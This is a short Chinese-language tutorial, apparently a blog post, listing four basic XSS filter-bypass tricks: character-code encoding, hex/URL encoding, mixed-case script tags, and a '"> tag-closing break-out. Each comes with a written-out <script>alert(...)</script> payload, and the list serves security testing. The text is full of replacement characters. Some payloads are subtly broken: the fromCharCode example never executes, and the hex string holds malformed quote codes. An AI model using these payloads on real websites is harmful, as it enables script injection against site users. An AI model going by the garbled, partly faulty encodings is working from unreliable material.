XSS繞過技術 XSS插入繞過一些方式總結 我們友情進行XSS檢查��,偶然跳出個小彈窗�,其中我們總結了一些平時可能用到的XSS插入方式����,方便我們以后進行快速檢查�,也提供了一定的思路,其中XSS有反射��、存儲����、DOM這三類,至于具體每個類別的異同之處��,本文不做學術介紹���,直接介紹實際的插入方式
0x00前言
我們友情進行XSS檢查��,偶然跳出個小彈窗,其中我們總結了一些平時可能用到的XSS插入方式����,方便我們以后進行快速檢查���,也提供了一定的思路�����,其中XSS有反射�����、存儲、DOM這三類����,至于具體每個類別的異同之處����,本文不做學術介紹��,直接介紹實際的插入方式����。
四種超級基礎的繞過方法��。
1.轉換為ASCII碼
例子:原腳本為<script>alert(‘I love F4ck’)</script >
通過轉換��,變成:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
2.轉換為HEX(十六進制)
例子:原腳本為<script>alert(‘I love F4ck’)</script>
通過轉換,變成:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
3.轉換腳本的大小寫
例子:原腳本為<script>alert(‘I love F4ck’)</script>
轉換為:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
4.增加閉合標記”>
例子:原腳本為<script>alert(‘I love F4ck’)</script>
轉換為:”><script>alert(‘I love F4ck’)</script>
